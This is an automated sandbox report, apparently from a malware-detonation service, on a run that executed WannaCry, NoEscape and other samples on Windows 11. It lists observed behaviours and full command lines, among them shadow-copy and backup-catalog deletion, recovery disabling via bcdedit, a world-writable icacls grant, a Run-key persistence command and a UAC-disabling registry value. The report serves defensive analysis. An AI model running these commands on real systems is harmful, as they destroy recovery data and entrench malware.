Malware Analysis Report

2025-06-16 06:42

Sample ID 240222-ggr71adc74
Target sample
SHA256 70b68ac1477e49a4342383c6eff1056f6a18ff0727aa20630e9e7bc8701011f1
Tags
wannacry discovery evasion persistence ransomware spyware stealer trojan worm
score
10/10

Analysis Overview

score
10/10

SHA256

70b68ac1477e49a4342383c6eff1056f6a18ff0727aa20630e9e7bc8701011f1

Threat Level: Known bad

The file sample was found to be: Known bad.

Malicious Activity Summary

wannacry discovery evasion persistence ransomware spyware stealer trojan worm

Wannacry

Modifies WinLogon for persistence

UAC bypass

Deletes shadow copies

Disables RegEdit via registry modification

Reads user/profile data of web browsers

Drops startup file

Modifies file permissions

Executes dropped EXE

Loads dropped DLL

Checks installed software on the system

Drops desktop.ini file(s)

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Sets desktop wallpaper using registry

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

NTFS ADS

Modifies data under HKEY_USERS

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-22 05:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-22 05:46

Reported

2024-02-22 06:04

Platform

win11-20240221-en

Max time kernel

997s

Max time network

998s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\sample

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\winnt32.exe" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDD0AC.tmp C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected] N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDD0C2.tmp C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected] N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\crashpad_handler.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\Downloadly = "\"C:\\Users\\Admin\\Programs\\Downloadly\\Downloadly.exe\"" C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sjlfnnfcj325 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_WannaCrypt0r.zip\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\Downloadly = "\"C:\\Users\\Admin\\Programs\\Downloadly\\Downloadly.exe\"" C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\noescape.png" C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnt32.exe C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File opened for modification C:\Windows\winnt32.exe C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File created C:\Windows\winnt32.exe\:Zone.Identifier:$DATA C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "156" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1637591879-962683004-3585269084-1000\{9CF847B0-88EA-4887-823D-18635AAE32A5} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\Downloadly.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\NoEscape.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\winnt32.exe\:Zone.Identifier:$DATA C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe N/A
File opened for modification C:\Users\Admin\Downloads\YouAreAnIdiot.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\YouAreAnIdiot (1).zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected] N/A
N/A N/A C:\Users\Admin\Programs\Downloadly\Downloadly.exe N/A
N/A N/A C:\Users\Admin\Programs\Massive\Massive.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2260 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 1740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2260 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\sample

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ff8308e9758,0x7ff8308e9768,0x7ff8308e9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3208 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3188 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4484 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5004 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5180 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5296 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5500 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5816 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2600 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6092 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:2

C:\Users\Admin\Desktop\YouAreAnIdiot.exe

"C:\Users\Admin\Desktop\YouAreAnIdiot.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 484 -ip 484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 484 -s 1452

C:\Users\Admin\Desktop\YouAreAnIdiot.exe

"C:\Users\Admin\Desktop\YouAreAnIdiot.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4932 -ip 4932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 1436

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2844 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5952 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected]

"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected]"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 14091708581259.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected] vs

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "sjlfnnfcj325" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "sjlfnnfcj325" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\tasksche.exe\"" /f

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
